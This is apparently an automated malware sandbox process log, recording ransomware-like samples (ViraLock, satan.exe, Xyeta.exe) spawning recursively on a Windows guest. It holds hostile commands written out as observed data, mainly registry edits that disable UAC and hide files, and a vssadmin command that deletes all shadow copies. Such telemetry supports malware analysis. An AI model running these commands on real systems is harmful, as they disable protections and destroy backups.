reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
48⤵
PID:2344

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
48⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dikgEEEg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
48⤵
PID:1156

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
49⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
46⤵
- Modifies visibility of file extensions in Explorer
PID:4224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
46⤵
PID:4456

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
46⤵
- UAC bypass
PID:300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YeIoAMoE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
46⤵
PID:1704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
47⤵
PID:4144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
44⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4352

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
44⤵
PID:1656

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
44⤵
- UAC bypass
PID:1080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sIkgEAcc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
44⤵
PID:4612

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
45⤵
PID:4780

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
42⤵
- Modifies visibility of file extensions in Explorer
PID:752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
42⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
42⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iaEAgYQE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
42⤵
PID:4728

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
43⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
40⤵
PID:2188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
40⤵
- Modifies registry key
PID:300

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
40⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqUkIkMk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
40⤵
PID:672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
41⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3732

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
41⤵
PID:2388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
38⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
38⤵
PID:3472

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
38⤵
- Modifies registry key
PID:4264

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
39⤵
PID:3200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tOkkUAkk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
38⤵
PID:3128

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
39⤵
PID:4436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
36⤵
- Modifies visibility of file extensions in Explorer
PID:4388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
36⤵
PID:468

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
36⤵
- UAC bypass
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zigYkcww.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
36⤵
PID:1480

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
37⤵
PID:2428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
34⤵
- Modifies visibility of file extensions in Explorer
PID:2032

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
34⤵
PID:632

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
34⤵
- UAC bypass
PID:5100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gyEkUIMs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
34⤵
PID:4180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
35⤵
PID:3024

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
32⤵
- Modifies visibility of file extensions in Explorer
PID:1484

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
32⤵
PID:1328

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
32⤵
- UAC bypass
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GQwwwcws.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
32⤵
PID:2456

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
33⤵
PID:4804

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
30⤵
- Modifies visibility of file extensions in Explorer
PID:3552

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
30⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
30⤵
PID:5052

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
31⤵
PID:3992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\feokMogs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
30⤵
PID:4704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
31⤵
PID:4668

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
28⤵
- Modifies visibility of file extensions in Explorer
PID:272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
28⤵
PID:4180

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
28⤵
- UAC bypass
PID:2872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PsIEQwQE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
28⤵
PID:3640

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
29⤵
PID:2924

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
29⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
26⤵
- Modifies visibility of file extensions in Explorer
PID:3608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
26⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
26⤵
- UAC bypass
PID:3948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RysMoscc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
26⤵
PID:1680

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
27⤵
PID:3628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
24⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
24⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
24⤵
- UAC bypass
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mIsYYEcw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
24⤵
PID:1500

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
25⤵
PID:4332

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
22⤵
- Modifies visibility of file extensions in Explorer
PID:2924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
22⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
22⤵
- UAC bypass
- Modifies registry key
PID:3988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SiUAkkcE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
22⤵
PID:3056

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
23⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
20⤵
PID:4604

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
20⤵
PID:1792

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
20⤵
- UAC bypass
PID:4264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUYIYAkg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
20⤵
PID:1656

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
21⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
18⤵
- Modifies visibility of file extensions in Explorer
PID:224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
18⤵
PID:3748

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
18⤵
- UAC bypass
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AIIMAcos.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
18⤵
PID:4332

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
19⤵
PID:4368

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
16⤵
- Modifies visibility of file extensions in Explorer
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
16⤵
PID:2980

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
16⤵
- UAC bypass
PID:4116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZAcYcAUo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
16⤵
PID:4092

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
17⤵
PID:4380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
14⤵
- Modifies visibility of file extensions in Explorer
PID:4296

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
14⤵
PID:180

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
14⤵
- UAC bypass
PID:3996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bsEIgYYE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
14⤵
PID:784

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
15⤵
PID:4892

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
12⤵
PID:4436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
12⤵
PID:3864

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
12⤵
- UAC bypass
PID:224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RsskUYUE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
12⤵
PID:1840

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
13⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
10⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
10⤵
- Modifies registry key
PID:1848

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
10⤵
- UAC bypass
PID:2980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMswsQko.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
10⤵
PID:228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1360

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
11⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
8⤵
PID:3204

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
8⤵
PID:4780

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
8⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aIgUckQU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
8⤵
PID:3016

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
9⤵
PID:2604

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
6⤵
- Modifies visibility of file extensions in Explorer
PID:4180

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
6⤵
- Modifies registry key
PID:3024

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
6⤵
- UAC bypass
PID:3552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CAwswEYw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
6⤵
PID:1644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
7⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
4⤵
PID:4564

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
4⤵
PID:2612

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
4⤵
PID:1480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FSwcgokQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
4⤵
PID:4804

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
5⤵
PID:1396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
3⤵
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5712 /prefetch:8
3⤵
PID:4224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6344 /prefetch:8
3⤵
PID:716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6704 /prefetch:8
3⤵
PID:4604

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:4952

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4816

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
3⤵
- Executes dropped EXE
PID:4864

C:\Users\Admin\AppData\Roaming\Wugat\viwa.exe
"C:\Users\Admin\AppData\Roaming\Wugat\viwa.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:720

C:\Users\Admin\AppData\Roaming\Wugat\viwa.exe
"C:\Users\Admin\AppData\Roaming\Wugat\viwa.exe"
5⤵
- Executes dropped EXE
PID:4188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_f9e7deaf.bat"
4⤵
PID:2568

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1228

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
3⤵
- Executes dropped EXE
PID:4296

C:\Users\Admin\AppData\Roaming\Awzoe\andu.exe
"C:\Users\Admin\AppData\Roaming\Awzoe\andu.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3080

C:\Users\Admin\AppData\Roaming\Awzoe\andu.exe
"C:\Users\Admin\AppData\Roaming\Awzoe\andu.exe"
5⤵
- Executes dropped EXE
PID:4476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_2bb1b451.bat"
4⤵
PID:412

C:\Users\Admin\Downloads\Xyeta.exe
"C:\Users\Admin\Downloads\Xyeta.exe"
2⤵
- Executes dropped EXE
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 416
3⤵
- Program crash
PID:768

C:\Users\Admin\Downloads\Xyeta.exe
"C:\Users\Admin\Downloads\Xyeta.exe"
2⤵
- Executes dropped EXE
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 432
3⤵
- Program crash
PID:4728

C:\Users\Admin\Downloads\ViraLock.exe
"C:\Users\Admin\Downloads\ViraLock.exe"
2⤵
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
3⤵
PID:2016

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
4⤵
PID:272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
5⤵
PID:5664

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
6⤵
PID:5336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
7⤵
PID:5824

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
8⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
9⤵
PID:2292

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
10⤵
PID:5524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
11⤵
PID:644

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
12⤵
PID:5872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
13⤵
PID:5424

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
14⤵
PID:1756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
15⤵
PID:3948

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
16⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
17⤵
PID:5384

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
18⤵
PID:5876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
19⤵
PID:5424

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
20⤵
PID:2596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
21⤵
PID:5412

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
22⤵
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
23⤵
PID:5456

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
24⤵
PID:3780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
25⤵
PID:5396

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
26⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
25⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
25⤵
PID:5680

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
25⤵
PID:6088

C:\Windows\SysWOW64\cmd.exe
